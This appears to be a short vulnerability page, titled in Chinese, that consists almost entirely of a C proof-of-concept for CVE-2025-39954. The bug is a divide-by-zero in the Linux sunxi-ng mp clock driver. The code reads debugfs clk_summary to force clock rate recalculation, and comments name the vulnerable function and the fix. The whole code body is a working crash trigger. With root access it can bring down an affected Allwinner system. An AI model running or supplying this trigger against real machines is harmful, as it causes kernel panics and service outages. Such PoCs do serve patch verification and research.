CVE-2025-39954 Linux内核sunxi-ng时钟驱动除零漏洞

/* CVE-2025-39954 PoC - Trigger divide-by-zero in sunxi-ng mp clock driver * This PoC attempts to trigger the divide-by-zero by reading clock rates * on Allwinner (sunxi) platforms with affected kernel versions. * * Note: Requires access to the clock subsystem (typically root or CAP_SYS_ADMIN). * On affected kernels, reading the rate of a dual-divider clock where the * P divider register value is 0 will trigger a kernel oops/panic. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #define CLK_SYSFS_PATH "/sys/kernel/debug/clk" /* Attempt to enumerate and read clock rates via debugfs */ int trigger_clk_readback(void) { /* On affected kernels, reading the rate of clocks using the * sunxi-ng mp dual-divider hardware will trigger a divide-by-zero * in ccu_mp_recalc_rate() when the P divider register is 0. * * The vulnerable code path is in: * drivers/clk/sunxi-ng/ccu_mp.c -> ccu_mp_recalc_rate() * * The fix adds the missing P divider offset to the calculation: * rate = parent_rate / (p_div + p_offset) / (m_div + m_offset) */ printf("Triggering clock rate readback on sunxi platform...\n"); /* Simple trigger: read /sys/kernel/debug/clk/ contents or * use clk_summary to force recalc_rate on all clocks */ int fd = open("/sys/kernel/debug/clk/clk_summary", O_RDONLY); if (fd < 0) { perror("open clk_summary"); return -1; } char buf[4096]; /* Reading clk_summary triggers .recalc_rate on all registered clocks */ read(fd, buf, sizeof(buf) - 1); close(fd); printf("Clock readback completed. Check kernel logs for oops.\n"); return 0; } int main(int argc, char *argv[]) { printf("CVE-2025-39954 PoC - sunxi-ng mp divide-by-zero\n"); return trigger_clk_readback(); }